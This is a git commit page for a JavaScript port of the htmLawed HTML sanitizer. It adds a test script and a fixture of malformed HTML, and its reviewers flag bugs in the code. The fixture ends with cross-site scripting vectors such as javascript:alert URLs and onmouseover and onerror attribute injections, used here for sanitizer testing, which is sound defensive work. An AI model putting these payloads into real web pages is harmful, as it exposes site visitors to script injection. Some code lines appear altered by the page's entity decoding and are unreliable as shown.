add some tests, rename hl_bal function arg
parent
e6d3da4e08
commit
a5778a95c3
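--- a/[TEST SCRIPT PATH NOT SHOWN ON PAGE]
+++ b/[TEST SCRIPT PATH NOT SHOWN ON PAGE]
@@ -1,3 +1,24 @@
 const fs = require('fs');
 const htmLawed = require('./htmLawed.c.js');
-console.log(htmLawed.sanitize(fs.readFileSync(process.argv[2], { encoding: 'utf8' }), { safe: 1 }));
+var out1 = htmLawed.sanitize(fs.readFileSync('htmLawed_TESTCASE.txt', { encoding: 'utf8' }), { safe: 1, keep_bad: 1 });
+var check1 = fs.readFileSync('htmLawed_TESTCASE_out.htm', { encoding: 'utf8' });
+if (out1 == check1)
+console.log("[TESTCASE.txt] OK");
+else
+{
+console.log("[TESTCASE.txt] NOT OK, see htmLawed_TESTCASE_bad.htm");
+fs.writeFileSync('htmLawed_TESTCASE_bad.htm', out1, { encoding: 'utf8' });
+}
+
+var tests = fs.readFileSync('rsnake_xss.txt', { encoding: 'utf8' });
+var m;
+while ((m = /^(\d+)\.\s*([^\n]+)\n\nInput code »\n([\s\S]*?)\n\nOutput code »\n([\s\S]*?)\n\n/.exec(tests)))
+{
+var output = htmLawed.sanitize(m[3], { safe: 1, keep_bad: 1 }).trim();
+if (output === m[4])
+console.log("["+m[1]+"] "+m[2]+": OK");
+else
+console.log("["+m[1]+"] "+m[2]+": NOT OK\n"+m[4]+"\n vs \n"+output);
+tests = tests.substr(m[0].length);
+}
+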
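Review bot: The script reports failures only through console.log and never sets a non-zero exit status, so a runner such as npm test or CI treats a mismatch as success; both `else` branches should set `process.exitCode = 1;` before logging. `if (out1 == check1)` uses loose equality while the loop below uses `===`; both operands are strings here, so `===` is the consistent choice. The fixture paths are relative to the current working directory, so the script only works when launched from its own directory; `path.join(__dirname, 'htmLawed_TESTCASE.txt')` (and likewise for the other two files) would make it location-independent. The while loop also stops silently at the first entry that does not match the header regex, so one malformed entry hides every test after it; logging `tests.length` when it is non-zero after the loop would make that visible.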
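--- a/htmLawed.js
+++ b/htmLawed.js
@@ -161,8 +161,8 @@ var htmLawed = module.exports =
 t = htmLawed._strtr(t, { "\x01": '', "\x02": '', "\x03": '&', "\x04": '<', "\x05": '>' });
 if (C.tidy)
 t = htmLawed.hl_tidy(t, C.tidy, C.parent);
-return t;
 // eof
+return t;
 },
 hl_attrval: function(a, t, p)
 {
@@ -208,10 +208,10 @@ var htmLawed = module.exports =
 return (r.length > 0 ? r.join(s) : (p['default'] || 0));
 // eof
 },
-hl_bal: function(t, perf, intag)
+hl_bal: function(t, keep_bad, intag)
 {
-if (perf === undefined)
-perf = 1;
+if (keep_bad === undefined)
+keep_bad = 1;
 // balance tags
 // by content
 var cont = {};
@@ -271,7 +271,7 @@ var htmLawed = module.exports =
 // intag sets allowed child
 intag = ((el.F[intag] && intag != '#pcdata') || el.O[intag]) ? intag : 'div';
 if (cont.E[intag])
-return (!perf ? '' : htmLawed.replace(/</g, '<').replace(/>/g, '>'));
+return (!keep_bad ? '' : htmLawed.replace(/</g, '<').replace(/>/g, '>'));
 var inOk = getCont(intag);
 var ok = {}, q = [], ql; // q = seq list of open non-empty ele
 var _ob = '';
@@ -421,13 +421,13 @@ var htmLawed = module.exports =
 delete cont.I['ins'];
 }
 // bad tags, & ele content
-if (e && (perf == 1 || (ok['#pcdata'] && (perf == 3 || perf == 5))))
+if (e && (keep_bad == 1 || (ok['#pcdata'] && (keep_bad == 3 || keep_bad == 5))))
 _ob += '<'+s+e+a+'>';
 if (x !== '' && x !== null)
 {
 if (x.trim().length > 0 && ((ql && cont.B[p]) || (cont.B[intag] && !ql))) // FIXME trim
 _ob += '<div>'+x+'</div>';
-else if (perf < 3 || ok['#pcdata'])
+else if (keep_bad < 3 || ok['#pcdata'])
 _ob += x;
 else if (x.indexOf("\x02\x04") >= 0)
 {
@@ -435,10 +435,10 @@ var htmLawed = module.exports =
 for (var _i = 0; _i < x.length; _i++)
 {
 var v = x[_i];
-_ob += v.substr(0, 2) == "\x01\x02" ? v : (perf > 4 ? v.replace(/\S+/g, '') : '');
+_ob += v.substr(0, 2) == "\x01\x02" ? v : (keep_bad > 4 ? v.replace(/\S+/g, '') : '');
 }
 }
-else if (perf > 4)
+else if (keep_bad > 4)
 _ob += x.replace(/\S+/g, '');
 }
 }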
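Review bot: The renamed line in the `@@ -271,7` hunk still calls `htmLawed.replace(...)` on the exported module object instead of on the string argument `t`, so unless the module defines a `replace` member this branch throws a TypeError whenever `cont.E[intag]` is truthy and keep_bad is non-zero; it should read `return (!keep_bad ? '' : t.replace(/</g, '&lt;').replace(/>/g, '&gt;'));`. As rendered here the replacement strings on that line and the `'<'+s+e+a+'>'` escape in the `@@ -421,13` hunk appear as bare `<` and `>`, which would re-emit rejected tags unescaped under keep_bad 1; that is most likely entity decoding by the page rather than the source, but since this is the sanitizer's fallback for content that failed balancing it is worth confirming against the checked-in file. The rename is applied consistently across all five hunks and now matches the `keep_bad` option the new test script passes; a short comment at the signature describing the values these branches distinguish, e.g. `// keep_bad: 1 escapes rejected tags, 3/5 escape them only where #pcdata is allowed, other values drop them; text handling for values > 4 is below`, would make the parameter self-describing. `hl_bal` begins in the `@@ -208,10` hunk and its body continues outside the hunks shown.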
@ -0,0 +1,450 @@
|
||||||
|
/*
|
||||||
|
htmLawed_TESTCASE.txt, 27 February 2016
|
||||||
|
htmLawed 1.1.22, 5 March 2016
|
||||||
|
Copyright Santosh Patnaik
|
||||||
|
Dual licensed with LGPL 3 and GPL 2+
|
||||||
|
A PHP Labware internal utility - http://www.bioinformatics.org/phplabware/internal_utilities/htmLawed
|
||||||
|
*/
|
||||||
|
|
||||||
|
This file has UTF-8-encoded text with both correct and incorrect/malformed HTML/XHTML code snippets to test htmLawed (test cases/samples). The entire text may also be used as a unit.
|
||||||
|
|
||||||
|
************************************************
|
||||||
|
when viewing this file in a web browser, set the
|
||||||
|
character encoding to Unicode/UTF-8
|
||||||
|
************************************************
|
||||||
|
|
||||||
|
--------------------- start --------------------
|
||||||
|
|
||||||
|
<em>Try different $config and $spec values. Some text even when filtered in will not be displayed in a rendered web-page</em><br />
|
||||||
|
|
||||||
|
<h6>Attributes</h6>
|
||||||
|
|
||||||
|
<strong>Xml:lang:</strong><a lang="en" xml:lang="en"></a>, <a lang="en"></a>, <a xml:lang="en"></a><br />
|
||||||
|
<strong>Standard, predefined value, or empty attribute:</strong> <input type="text" disabled="disabled" />, <input type="text" disabled="disabled" />, <input type="text" disabled="disabled" /><br />
|
||||||
|
<strong>Required:</strong> <img src="src" alt="image" />, <img alt="image" src="src" /><br />
|
||||||
|
<strong>Quote & space variation:</strong> <a id="id1" name="xy">a</a>, <a id="id2" name="xy">a</a>, <a id="id3" name="n">a</a><br />
|
||||||
|
<strong>Invalid:</strong> <a id="id4">a</a><br />
|
||||||
|
<strong>Duplicated:</strong> <a id="id6">a</a><br />
|
||||||
|
<strong>Deprecated:</strong> <a id="id7" target="self" name="n">a</a>, <hr style="border-style: none; border: 0; background-color: gray; color: gray;" /><br />
|
||||||
|
<strong>Casing:</strong> <a href=""></a><br />
|
||||||
|
<strong>Custom:</strong> <img alt="image" src="src" /><br />
|
||||||
|
<strong>Data-*:</strong> <a>a</a><br />
|
||||||
|
<strong>Admin-restricted?:</strong> <a href="x"></a>
|
||||||
|
|
||||||
|
<h6>Attribute values</h6>
|
||||||
|
|
||||||
|
<strong>Duplicate ID value:</strong><a id="id8"></a>, <a id="my_id8"></a>, <a></a><br />
|
||||||
|
(try 'my_' for prefix)<br />
|
||||||
|
<strong>Double-quotes in value:</strong><a title="ab"></a>, <a title="ab"></a>, <a title="ab"c"></a><br />
|
||||||
|
(try filter for CSS expression)<br />
|
||||||
|
<strong>CSS expression</strong>: <div style="prop: ();"></div><div style="prop: ()"></div><div style="prop: ();"></div><div style="prop : ()"></div><div style="prop: (js);"></div><div style="prop: (js;)"></div><div style="prop: ('js');"></div><div style="prop : expr ession('js':)"></div><div style="prop: ( 'js@ );"></div><br />
|
||||||
|
<strong>Other:</strong> <input size="50" class="my" value="an input an input an input" />, <input size="5" class="your" value="an input" /><br />
|
||||||
|
(try 'maxlen', 'maxval', etc., for 'input' in '$spec')
|
||||||
|
|
||||||
|
<h6>Blockquotes</h6>
|
||||||
|
|
||||||
|
<blockquote><div>abc</div></blockquote><br />
|
||||||
|
<blockquote><div>abc<div>def</div></div></blockquote><br />
|
||||||
|
<blockquote><div>abc</div><div>def</div></blockquote><br />
|
||||||
|
<blockquote><div>abc<div>def</div>ghi</div></blockquote><br />
|
||||||
|
abc<div>def</div>ghi<br />
|
||||||
|
<blockquote><div>QQQ<div>x</div><!-- comment --></div></blockquote><br />
|
||||||
|
<blockquote><div>x</div><div><!-- comment -->QQQ</div></blockquote><br />
|
||||||
|
<blockquote><div><!-- comment --><div>x</div>QQQ<div>x</div></div></blockquote><br />
|
||||||
|
<blockquote><div>x<!-- comment --></div><div>QQQ</div></blockquote><p>x</p><br />
|
||||||
|
<br />
|
||||||
|
(try with blockquote parent)
|
||||||
|
|
||||||
|
<h6>CDATA sections</h6>
|
||||||
|
|
||||||
|
<strong>Special characters inside:</strong> <![CDATA[ ]]> ]]>, <![CDATA[ 3 < 4 > 3.5, & 4 > 4 ]]><br />
|
||||||
|
<strong>Normal:</strong> <![CDATA[ check ]]>, <em>CDATA follows:<![CDATA[ check ]]></em><br />
|
||||||
|
<strong>Malformed:</strong> <![cdata check ]]>, < ![CDATA check ]]>, <![CDATA check ]]>, < ![CDATA check ] ]><br />
|
||||||
|
<strong>Invalid:</strong> <em>>CDATA in tag content</em>, <table><![CDATA[ check ]]><tr><td>text not allowed</td></tr></table>
|
||||||
|
|
||||||
|
<h6>Complex-1: deprecated elements</h6>
|
||||||
|
|
||||||
|
<div style="text-align: center;">
|
||||||
|
The PHP <span style="text-decoration: line-through;">software</span> script used for this <span style="text-decoration: line-through;">web-page</span> webpage is <span style="font-weight: bold; font-size: 200%; color: red; font-family: arial;">htmLawedTest.php</span>, from <span style="color:green; text-decoration: underline;">PHP Labware</span>.
|
||||||
|
</div>
|
||||||
|
|
||||||
|
<h6>Complex-2: deprecated attributes</h6>
|
||||||
|
|
||||||
|
<img src="s" alt="a" id="n" /><img src="s" alt="a" id="id9" />
|
||||||
|
<br style="clear: left;" />
|
||||||
|
<hr style="border-style: none; border: 0; background-color: gray; color: gray; size: 1px;" />
|
||||||
|
<img src="s" alt="image" width="10em" height="20" style="padding:5px; float: left; margin-left: 10px; margin-right: 10px; margin-top: 10px; margin-bottom: 10px; border: 1px;" id="id10" />
|
||||||
|
<table width="50em" style="margin: auto; background-color: red;">
|
||||||
|
<tr>
|
||||||
|
<td style="width: 20%;">
|
||||||
|
<div style="margin: auto;">
|
||||||
|
<h3 style="text-align: right;">Section</h3>
|
||||||
|
<p style="text-align: right;">Para</p>
|
||||||
|
<ol style="list-style-type: lower-latin;"><li><a name="x" id="x">First</a> <a name="x" id="id11">item</a></li></ol>
|
||||||
|
</div>
|
||||||
|
</td>
|
||||||
|
<td style="width: auto;">
|
||||||
|
<ol style="list-style-type: decimal;"><li>First item</li></ol>
|
||||||
|
</td>
|
||||||
|
</tr>
|
||||||
|
</table>
|
||||||
|
<br style="clear: both;" />
|
||||||
|
|
||||||
|
<h6>Complex-3: embed, object, area</h6>
|
||||||
|
|
||||||
|
<object width="425" height="350"><param name="movie" value="http://www.youtube.com/v/ls7gi1VwdIQ" /></param><embed src="http://www.youtube.com/v/ls7gi1VwdIQ" type="application/x-shockwave-flash" width="425" height="350"></embed></object><br />
|
||||||
|
|
||||||
|
<embed src="http://www.youtube.com/v/ls7gi1VwdIQ" type="application/x-shockwave-flash" width="425" height="350"></embed><br />
|
||||||
|
|
||||||
|
<object data="1.gif" type="image/gif" usemap="#map1"><map name="map1" id="map1">
|
||||||
|
<p>navigate the site: <a href="1" shape="rect" coords="0,0,118,28">1</a> | <a href="3" shape="circle" coords="184,200,60">3</a> | <a href="4" shape="poly" coords="276,0,276,28,100,200,50,50,276,0">4</a></p>
|
||||||
|
<area href="5" shape="rect" coords="0,0,118,28" alt="area" />
|
||||||
|
</map></object>
|
||||||
|
|
||||||
|
<param name="name" />value</param>
|
||||||
|
|
||||||
|
<object id="obj1">
|
||||||
|
<param name="param1" />
|
||||||
|
<object id="obj2">
|
||||||
|
<param name="param2" />
|
||||||
|
</object>
|
||||||
|
</object>
|
||||||
|
|
||||||
|
<h6>Complex-4: nested and other tables</h6>
|
||||||
|
|
||||||
|
<table border="1" style="background-color: red;"> <tr> <td> Cell </td> <td colspan="2" rowspan="2"> <table border="1" style="background-color: green;"> <tr> <td> Cell </td> <td colspan="2" rowspan="2"> </td> </tr> <tr> <td> Cell </td> </tr> <tr> <td> Cell </td> <td> Cell </td> <td> Cell </td> </tr> </table> </td> </tr> <tr> <td> Cell </td> </tr> <tr> <td> Cell </td> <td> Cell </td> <td> Cell </td> </tr> </table><br />
|
||||||
|
<strong>PCDATA wrong:</strong> <table>Well<caption>Hello</caption></table><br />
|
||||||
|
<strong>Missing tr:</strong> <table><td>Well</td></table><br />
|
||||||
|
|
||||||
|
<h6>Complex-5: pseudo, disallowed or non-HTML tags</h6>
|
||||||
|
|
||||||
|
(Try different 'keep_bad' values)
|
||||||
|
<*> Pseudotags <*>
|
||||||
|
<xml>Non-HTML tag xml</xml>
|
||||||
|
<p>
|
||||||
|
Disallowed tag p
|
||||||
|
</p>
|
||||||
|
<ul>Bad<li>OK</li></ul>
|
||||||
|
|
||||||
|
<h6>Elements</h6>
|
||||||
|
|
||||||
|
<strong>Unbalanced:</strong> <a href="h"><em>check</em></a></em><br />
|
||||||
|
<strong>Non-XHTML:</strong> <div><div style="text-align: center;"><ul></ul></div></div><br />
|
||||||
|
<strong>Malformed:</strong> < a href=""></a>, <a href=""></a>, <a href=""></a>, <a href=""></a>, <a href="">< /a>, < a href=""></a>, <img src="s" alt="a" />, <img src="s" alt="a" />, <imgsrc="s" alt="a" /><br />
|
||||||
|
<strong>Invalid:</strong> <image src="s" alt="a" /><br />
|
||||||
|
<strong>Empty:</strong> <img src="s" alt="a" />, <img src="s" alt="a" /></img>, <img src="s" alt="a" />text</img><br />
|
||||||
|
<strong>Content invalid:</strong> <a href="h">1</a><a>2</a></a><br />
|
||||||
|
<strong>Content invalid?:</strong> <form action="action"></form><br /> (try setting 'form' as parent)<br />
|
||||||
|
<strong>Casing:</strong> <a href=""></a><br />
|
||||||
|
<strong>Check for tidy:</strong> <br /><hr /></div><hr /></div><hr /></div><div>hi</div>
|
||||||
|
|
||||||
|
<h6>Entities</h6>
|
||||||
|
|
||||||
|
<strong>Special:</strong> & 3 < 2 & 5>4 and j >i >a & i<j>a<br />
|
||||||
|
<strong>Padding:</strong> B B f f &#x003; &#0003;<br />
|
||||||
|
<strong>Malformed:</strong> & #x27;, &x27;, ' &TILDE;, &tilde<br />
|
||||||
|
<strong>Invalid:</strong> &#x3;, &#55296;, &#03;, &#1114112;, &#xffff, &bad;<br />
|
||||||
|
<strong>Discouraged characters:</strong> &#x7f;, &#132;, , <br />
|
||||||
|
<strong>Context:</strong> '>', <?<br />
|
||||||
|
<strong>Casing:</strong> ', ', &TILDE;, ˜
|
||||||
|
<br />
|
||||||
|
(also check named-to-numeric and hexdec-to-decimal, and vice versa, conversions)
|
||||||
|
|
||||||
|
<h6>Format</h6>
|
||||||
|
|
||||||
|
<strong>Valid but ill-formatted:</strong> text <!-- comment -->
|
||||||
|
text <!--
|
||||||
|
A c o m m e n t -->
|
||||||
|
<script>
|
||||||
|
<![CDATA[
|
||||||
|
code
|
||||||
|
]]>
|
||||||
|
</script><!-- comment --><![CDATA[ cdata ]]> <a>text</b> text<pre id="none">p r e</pre>
|
||||||
|
<textarea rows="10" cols="50">text</textarea> <textarea rows="10" cols="50">
|
||||||
|
text text
|
||||||
|
</textarea> text text <br /><hr />
|
||||||
|
text <img src="none" alt="none" /> t<em class="none">e<strong>x</strong>t</em>
|
||||||
|
text <img src="none" alt="none" /> <b>t<em> e <strong> x </strong> t</em></b>
|
||||||
|
</a><a href="a"> text <img src="none" alt="none" /> <b>t <em> e <strong> x </strong> t</em></b>
|
||||||
|
</a>
|
||||||
|
<span style="background-color: yellow;">text <img src="none" alt="none" /> <b> <em> t e <strong> x </strong> t</em></b></span>
|
||||||
|
<script>script</script>
|
||||||
|
<div>
|
||||||
|
<pre>p <a>r</a> e <!-- comment --> </pre>
|
||||||
|
<pre>
|
||||||
|
pre
|
||||||
|
</pre>
|
||||||
|
</div>
|
||||||
|
<div><div><table border="1" style="background-color: red;"><tr><td>Cell</td><td colspan="2" rowspan="2"><table border="1" style="background-color: green;"><tr><td>Cell</td><td colspan="2" rowspan="2"></td></tr><tr><td>Cell</td></tr><tr><td>Cell</td><td>Cell</td><td>Cell</td></tr></table></td></tr><tr><td>Cell</td></tr><tr><td>Cell</td><td>Cell</td><td>Cell</td></tr></table></div></div>
|
||||||
|
(try to compact or beautify)
|
||||||
|
|
||||||
|
<h6>Forms</h6>
|
||||||
|
|
||||||
|
(note nesting of 'form', missing required attributes, etc.)<br />
|
||||||
|
<form action="action"><div>
|
||||||
|
<script type="text/javascript">s</script>
|
||||||
|
<fieldset><legend>p</legend>l <input name="personal_lastname" type="text" tabindex="1" /></fieldset>
|
||||||
|
<input name="h" type="checkbox" value="h" tabindex="20" /> h
|
||||||
|
<textarea name="t" rows="10" cols="50">t</textarea>
|
||||||
|
</div></form><form action="a" method="get"></form></form><br />
|
||||||
|
<form action="b" method="get"><p><input type="text" value="i" /></p></form><br />
|
||||||
|
<form action="action"><div>B:<input type="text" value="b" />C:<input type="text" value="c" /></div></form><br />
|
||||||
|
(try each of these lines separately)<br />
|
||||||
|
<form action="a"><div>what<br />
|
||||||
|
</div></form><form action="a"><div>what
|
||||||
|
(try with container as div and as form)<br />
|
||||||
|
</div></form><form action="action"><div>c <a>a</a> <b>b</b><input /><script>s</script>
|
||||||
|
|
||||||
|
<h6>HTML comments (also CDATA)</h6>
|
||||||
|
|
||||||
|
<strong>Script inside:</strong> <!--[if gte IE 4]>
|
||||||
|
<SCRIPT>alert('XSS');</SCRIPT>
|
||||||
|
<![endif]--><br />
|
||||||
|
<strong>Special characters inside: <!-- <![CDATA check ]]> -->, <!-- 3 < 4 > 3.5, & 4 > 4 -->, <!-- che--ck -->, <!--[if !IE]> <--><a>c</a><!--> <![endif]--><br />
|
||||||
|
<strong>Normal:</strong> <!-- check -->, <!--check -->, <em>comment:<!-- check --></em><!-- check -->, <table><!-- check --><tr><td>text not allowed</td></tr></table><br />
|
||||||
|
<strong>Malformed:</strong> <![cdata check ]]>, < ![CDATA check ]]>, < ![CDATA check ] ]><br />
|
||||||
|
Invalid:</strong> <em>>comment in tag content</em>, <!--check-->
|
||||||
|
|
||||||
|
<h6>HTML5</h6>
|
||||||
|
|
||||||
|
<strong>figure and figcaption:</strong> <figure><img src="picture.jpg" alt="picture" /><figcaption>Caption for the awesome picture</figcaption></figure>
|
||||||
|
<strong>article:</strong> <h1>A</h1><p>B</p><article><h2>C</h2></article><article><h2>E</h2><p>F</p><p>G</p></article>
|
||||||
|
<strong>meter</strong>: <p>Heat <meter min="100" max="200" value="150">150</meter>.</p>
|
||||||
|
<strong>datalist</strong>: <input /><datalist id="b"><option value="c"><option value="d"></datalist>
|
||||||
|
|
||||||
|
<h6>Ins-Del</h6>
|
||||||
|
|
||||||
|
(depending on context, these elements can be of either block or inline type)<br />
|
||||||
|
<p><ins datetime="d" cite="c"><div>block</ins></p></div></ins></p><div><br />
|
||||||
|
<p><del>d</del></p><br />
|
||||||
|
<p><ins><del>d</del></ins></p><div><ins><p><del><div>d</del></p></ins></div></del></p></ins></div><ins><div>d</div></ins>
|
||||||
|
|
||||||
|
<h6>Lists</h6>
|
||||||
|
|
||||||
|
<div><strong>Invalid character data</strong>: <ul><li>(item</li>)</ul><br />
|
||||||
|
<strong>Definition list</strong>: <dl><dt>a</dt>bad<dd>first <em>one</em></dd><dt>b</dt><dd>second</dd></dl><br />
|
||||||
|
<strong>Definition list, close-tags omitted</strong>: <dl><dt>a</dt>bad<dd>first <em>one</em></dd><dt>b</dt><dd>second</dd></dl><br />
|
||||||
|
<strong>Definition lists, nested</strong>: <dl>
|
||||||
|
<dt>T1</dt>
|
||||||
|
<dd>D1</dd>
|
||||||
|
<dt>T2</dt>
|
||||||
|
<dd>D2<dl><dt>t1</dt><dd>d1</dd><dt>t2</dt><dd>d2</dd></dl></dd>
|
||||||
|
<dt>T3</dt>
|
||||||
|
<dd>D3</dd>
|
||||||
|
<dt>T4</dt>
|
||||||
|
<dd>D4<dl><dt>t1</dt><dd>d1</dd></dl></dd>
|
||||||
|
</dl><br />
|
||||||
|
<strong>Definition lists, nested, close-tags omitted</strong>: <dl>
|
||||||
|
<dt>T1
|
||||||
|
</dt><dd>D1</dd>
|
||||||
|
<dt>T2</dt>
|
||||||
|
<dd>D2<dl><dt>t1</dt><dd>d1</dd><dt>t2</dt><dd>d2</dd></dl></dd>
|
||||||
|
<dt>T3
|
||||||
|
</dt><dd>D3
|
||||||
|
</dd><dt>T4
|
||||||
|
</dt><dd>D4<dl><dt>t1</dt><dd>d1</dd></dl></dd>
|
||||||
|
</dl><br />
|
||||||
|
<strong>Nested</strong>: <ul>
|
||||||
|
<li>l1</li>
|
||||||
|
<li>l2<ol><li>lo1</li><li>lo2</li></ol></li>
|
||||||
|
<li>l3</li>
|
||||||
|
<li>l4<ol><li>lo3</li><li>lo4<ol><li>lo5</li></ol></li></ol></li>
|
||||||
|
</ul><br />
|
||||||
|
<strong>Nested, directly</strong>: <ul>
|
||||||
|
<li>l1</li>
|
||||||
|
<ol>l2</ol>
|
||||||
|
<li>l3</li>
|
||||||
|
</ul><br />
|
||||||
|
<strong>Nested, close-tags omitted</strong>: <ul>
|
||||||
|
<li>l1</li>
|
||||||
|
<li>l2<ol><li>lo1</li><li>lo2</li></ol>
|
||||||
|
</li><li>l3
|
||||||
|
</li><li>l4<ol><li>lo3</li><li>lo4<ol><li>lo5</li></ol></li></ol>
|
||||||
|
</li></ul><br />
|
||||||
|
<strong>Complex</strong>:
|
||||||
|
<ol><script></script><li><table><tr><td>
|
||||||
|
<ul><li id="search" class="widget widget_search"> </li></ul></td></tr></table></li></ol></div></form><form id="searchform" method="get" action="http://kohei.us">
|
||||||
|
<div>
|
||||||
|
|
||||||
|
<input type="text" name="s" id="s" size="15" /><br />
|
||||||
|
<input type="submit" value="Search" />
|
||||||
|
</div>
|
||||||
|
</form>
|
||||||
|
</li></ul>
|
||||||
|
</td></tr></table></li></ol>
|
||||||
|
<strong>Menu</strong>: <ul style="list-style-type: decimal;"><li><ul>
|
||||||
|
<button type="button">New...</button>
|
||||||
|
</ul></li><li><ul><button type="button">Cut...</button></ul></li>
|
||||||
|
</ul>
|
||||||
|
|
||||||
|
<h6>Microdata</h6>
|
||||||
|
|
||||||
|
<div>
|
||||||
|
I am <span>X</span> but people call me <span>Y</span>.
|
||||||
|
Find me at <a href="http://www.xy.com">www.xy.com</a>
|
||||||
|
</div>
|
||||||
|
|
||||||
|
<h6>Microsoft Word</h6>
|
||||||
|
|
||||||
|
<strong>Proprietary tag</strong>: <p class="3DMsoNormal"><o:p> </o:p></p><br />
|
||||||
|
<strong>XML declaration</strong>: <?xml:namespace prefix = o ns = "urn:schemas-microsoft-com:office:office" /><br />
|
||||||
|
<strong>XML-invalid character code-point (may not replicate)</strong>: <p class="3DMsoNormal">“Where is he?” asked both Mary – the one so lovely – and Jane.</p>
|
||||||
|
|
||||||
|
<h6>Nesting</h6>
|
||||||
|
|
||||||
|
<strong>Block or inline a</strong>: <p><a href="link">text</a></p><a href="link"><div>hi</div></a><br />
|
||||||
|
|
||||||
|
<h6>Non-English text-1</h6>
|
||||||
|
|
||||||
|
Inscrieţi-vă acum la a Zecea Conferinţă Internaţională<br />
|
||||||
|
გთხოვთ ახლავე გაიაროთ რეგისტრაცია<br />
|
||||||
|
večjezično računalništvo<br />
|
||||||
|
<a title="อ.อ่าง">อ.อ่าง</a><br />
|
||||||
|
<a title="הירשמו כעת לכנס">Зарегистрируйтесь сейчас
|
||||||
|
на Десятую Международную Конференцию по</a><br />
|
||||||
|
(this file should have utf-8 encoding; some characters may not be displayed because of missing fonts, etc.)
|
||||||
|
|
||||||
|
<h6>Non-English text-2: entities</h6>
|
||||||
|
|
||||||
|
用统一码<br />
|
||||||
|
გთხოვთ<br />
|
||||||
|
Inscreva-se agora para a Décima Conferência Internacional Sobre O Unicode, realizada entre os dias 10 e 12 de março de 1997 em Mainz
|
||||||
|
na Alemanha.
|
||||||
|
|
||||||
|
<h6>Ruby</h6>
|
||||||
|
|
||||||
|
(need compatible browser)<br />
|
||||||
|
<ruby xml:lang="ja">
|
||||||
|
<rbc>
|
||||||
|
<rb>斎</rb>
|
||||||
|
<rb>藤</rb>
|
||||||
|
<rb>信</rb>
|
||||||
|
<rb>男</rb>
|
||||||
|
</rbc>
|
||||||
|
<rtc class="reading">
|
||||||
|
<rt>さい</rt>
|
||||||
|
<rt>とう</rt>
|
||||||
|
<rt>のぶ</rt>
|
||||||
|
<rt>お</rt>
|
||||||
|
</rtc>
|
||||||
|
<rtc class="annotation">
|
||||||
|
<rt xml:lang="en">W3C Associate Chairman</rt>
|
||||||
|
</rtc>
|
||||||
|
</ruby><br />
|
||||||
|
<ruby>
|
||||||
|
<rb>WWW</rb>
|
||||||
|
<rp>(</rp><rt>World Wide Web</rt><rp>)</rp>
|
||||||
|
</ruby><br />
|
||||||
|
<ruby>
|
||||||
|
A
|
||||||
|
<rp>(</rp><rt>aaa</rt><rp>)</rp>
|
||||||
|
</ruby>
|
||||||
|
|
||||||
|
|
||||||
|
<h6>Tables</h6>
|
||||||
|
|
||||||
|
<strong>Omitted closing tags:</strong> <table>
|
||||||
|
<colgroup><col style="x" /><col style="y" />
|
||||||
|
</colgroup><thead>
|
||||||
|
<tr><th>h1c1</th><th>h1c2
|
||||||
|
</th></tr></thead><tbody>
|
||||||
|
<tr><td>r1c1</td><td>r1c2
|
||||||
|
</td></tr><tr><td>r2c1</td><td>r2c2
|
||||||
|
</td></tr></tbody></table><br />
|
||||||
|
<strong>Nested, omitted closing tags:</strong> <table>
|
||||||
|
<colgroup><col style="x" /><col style="y" />
|
||||||
|
</colgroup><thead>
|
||||||
|
<tr><th>h1c1</th><th>h1c2
|
||||||
|
</th></tr></thead><tbody>
|
||||||
|
<tr><td>r1c1</td><td>r1c2<table>
|
||||||
|
<colgroup><col style="x" /><col style="y" />
|
||||||
|
</colgroup><thead>
|
||||||
|
<tr><th>h1c1</th><th>h1c2
|
||||||
|
</th></tr></thead><tbody>
|
||||||
|
<tr><td>r1c1</td><td>r1c2
|
||||||
|
</td></tr><tr><td>r2c1</td><td>r2c2
|
||||||
|
</td></tr></tbody></table>
|
||||||
|
</td></tr><tr><td>r2c1</td><td>r2c2
|
||||||
|
</td></tr></tbody></table><br />
|
||||||
|
|
||||||
|
<h6>Tag transformation</h6>
|
||||||
|
<strong>Font element intended as 'inline' element:</strong> <p><span style="color: red;">hi</span></p><br />
|
||||||
|
<strong>Font element intended as 'block' element:</strong> <div><span style="color: red;"><div>hi</span></div></span></div><br />
|
||||||
|
<strong>Font element intended as 'block' element:</strong> <div style="text-align: center;"><span style="color: red; font-family: serif, 'Times';"><div>hi</span></div><div>QQQ</div></span></div><br />
|
||||||
|
|
||||||
|
<h6>Tidy</h6>
|
||||||
|
<strong>White-space handling:</strong> abc<em> def </em> ghi abc <em>def</em> ghi
|
||||||
|
|
||||||
|
<h6>URLs</h6>
|
||||||
|
|
||||||
|
<strong>Relative and absolute:</strong> <a href="mailto:x"></a>, <a href="http://a.com/b/c/d.f"></a>, <a href="./../d.f"></a>, <a href="./d.f"></a>, <a href="d.f"></a>, <a href="#s"></a>, <a href="./../../d.f#s"></a><br />
|
||||||
|
(try base URL value of 'http://a.com/b/')<br />
|
||||||
|
<strong>CSS URLs:</strong> <div style="background-image: url('denied:a.gif');"></div>, <div style="background-image: URL("denied:a.gif");"></div>, <div style="background-image: url('denied:http://a.com/a.gif');"></div>, <div style="background-image: url('denied:./../a.gif');"></div>, <div style="background-image: url('denied:js:xss')"></div><br />
|
||||||
|
<strong>Double URLs:</strong> <a style="behaviour: url(denied:foo) url(denied:http://example.com/xss.htc)">b</a><br />
|
||||||
|
<strong>Anti-spam:</strong> (try regex for 'http://a.com', etc.) <a href="mailto:x@y.com"></a>, <a href="http://a.com/b@d.f"></a>, <a href="a.com/d.f" rel="nofollow"></a>, <a href="a.com/d.f" rel="1, 2"></a>, <a href="a.com/d.f"></a>, <a href="b.com/d.f"></a>, <a href="c.com/d.f">, </a><a href="denied:http://c.com/d.f"></a><br />
|
||||||
|
<strong>Soft-hyphen:</strong> <a href="http://q=ídis c">ídisc</a>
|
||||||
|
|
||||||
|
<h6>XSS</h6>
|
||||||
|
|
||||||
|
<img alt="<img onmouseover=confirm(1)//" src="src" />
|
||||||
|
'';!--"<xss>=&{()}<br />
|
||||||
|
<img src="denied:javascript%3Aalert('xss');" alt="image" /><br />
|
||||||
|
<img src="denied:javascript:alert('xss');" alt="image" /><br />
|
||||||
|
<img src="denied:java script:alert('xss');" alt="image" /><br />
|
||||||
|
<img src="denied:javascript:alert('XSS')" alt="image" /><br />
|
||||||
|
<span style="color: #FF6699'onmouseover='alert(1)//;">test</span>
|
||||||
|
<span style="color: img//onerror='alert`www.ptsecurity.com`'src=Psych0tr1a;">
|
||||||
|
<div style="javascript:alert('xss');"></div><br />
|
||||||
|
<div style="background-image:url(denied:javascript:alert('xss'));"></div><br />
|
||||||
|
<div style="background-image:url("denied:javascript:alert('xss')" );"></div><br />
|
||||||
|
